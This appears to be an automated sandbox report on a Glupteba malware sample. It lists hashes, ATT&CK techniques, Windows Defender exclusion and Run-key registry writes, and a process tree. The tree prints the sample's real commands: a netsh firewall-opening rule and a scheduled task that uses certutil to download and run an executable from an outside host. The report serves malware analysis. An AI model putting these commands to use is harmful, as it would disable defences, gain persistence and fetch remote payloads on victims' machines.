glupteba | aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0

General

Target

aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Size

3.8MB
MD5

75b7ef1e1078db669732ed9c778539d1
SHA1

62b185a7bc12c6e92085ab5acd8dd98f7b829970
SHA256

aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0
SHA512

76c0abde2882f01801bdd4dd6bec17919e688f587ec28cd75bf1ba92735d5b3ba96194f0239973a427866b1bf745abc8253335f31b1369ebbfc3c84156289cb9

Score

10^/10

glupteba discovery dropper evasion loader persistence trojan

Malware Config

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 4 IoCs

Processes:

resource	yara_rule
behavioral1/memory/960-56-0x0000000002A20000-0x0000000003116000-memory.dmp	family_glupteba
behavioral1/memory/960-57-0x0000000000400000-0x0000000000D2B000-memory.dmp	family_glupteba
behavioral1/memory/1228-67-0x0000000000400000-0x0000000000D2B000-memory.dmp	family_glupteba
behavioral1/memory/1372-70-0x0000000000400000-0x0000000000D2B000-memory.dmp	family_glupteba

Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
Executes dropped EXE 1 IoCs

Processes:

csrss.exe

pid process

1372 csrss.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

pid	process
1372	csrss.exe

Loads dropped DLL 2 IoCs

Processes:

aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe

pid	process
1228	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
1228	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe

Windows security modification 2 TTPs 12 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe = "0"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\d26671056783 = "0"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\LingeringCherry = "0"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\d26671056783.exe = "0"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Run\LingeringCherry = "\"C:\\Windows\\rss\\csrss.exe\""	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in Windows directory 3 IoCs

Processes:

makecab.exeaa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe

description	ioc	process
File created	C:\Windows\Logs\CBS\CbsPersist_20220520073043.cab	makecab.exe
File opened for modification	C:\Windows\rss	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
File created	C:\Windows\rss\csrss.exe	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

664 schtasks.exe
1864 schtasks.exe

pid	process
664	schtasks.exe
1864	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

netsh.exeaa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-471 = "Ekaterinburg Daylight Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time"	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exeaa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe

pid	process
960	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
1228	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe

description	pid	process
Token: SeDebugPrivilege	960	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
Token: SeImpersonatePrivilege	960	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe

Suspicious use of WriteProcessMemory 11 IoCs

Processes:

aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.execmd.exe

description	pid	process	target process
PID 1228 wrote to memory of 1672	1228	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe	cmd.exe
PID 1228 wrote to memory of 1672	1228	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe	cmd.exe
PID 1228 wrote to memory of 1672	1228	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe	cmd.exe
PID 1228 wrote to memory of 1672	1228	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe	cmd.exe
PID 1672 wrote to memory of 1472	1672	cmd.exe	netsh.exe
PID 1672 wrote to memory of 1472	1672	cmd.exe	netsh.exe
PID 1672 wrote to memory of 1472	1672	cmd.exe	netsh.exe
PID 1228 wrote to memory of 1372	1228	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe	csrss.exe
PID 1228 wrote to memory of 1372	1228	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe	csrss.exe
PID 1228 wrote to memory of 1372	1228	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe	csrss.exe
PID 1228 wrote to memory of 1372	1228	aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe	csrss.exe

C:\Users\Admin\AppData\Local\Temp\aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
"C:\Users\Admin\AppData\Local\Temp\aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:960

C:\Users\Admin\AppData\Local\Temp\aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe
"C:\Users\Admin\AppData\Local\Temp\aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0.exe"
2⤵
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1228

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\d26671056783\d26671056783.exe" enable=yes"
3⤵
- Suspicious use of WriteProcessMemory
PID:1672

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\d26671056783\d26671056783.exe" enable=yes
4⤵
- Modifies data under HKEY_USERS
PID:1472

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
3⤵
- Executes dropped EXE
PID:1372

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
4⤵
- Creates scheduled task(s)
PID:664

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- Creates scheduled task(s)
PID:1864

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220520073043.log C:\Windows\Logs\CBS\CbsPersist_20220520073043.cab
1⤵
- Drops file in Windows directory
PID:1188

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

1

T1031

Registry Run Keys / Startup Folder

1

T1060

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Disabling Security Tools

2

T1089

Modify Registry

3

T1112

Credential Access

Discovery

Query Registry

1

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\rss\csrss.exe
Filesize
3.8MB

MD5
75b7ef1e1078db669732ed9c778539d1

SHA1
62b185a7bc12c6e92085ab5acd8dd98f7b829970

SHA256
aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0

SHA512
76c0abde2882f01801bdd4dd6bec17919e688f587ec28cd75bf1ba92735d5b3ba96194f0239973a427866b1bf745abc8253335f31b1369ebbfc3c84156289cb9

Download Submit
\Windows\rss\csrss.exe
Filesize
3.8MB

MD5
75b7ef1e1078db669732ed9c778539d1

SHA1
62b185a7bc12c6e92085ab5acd8dd98f7b829970

SHA256
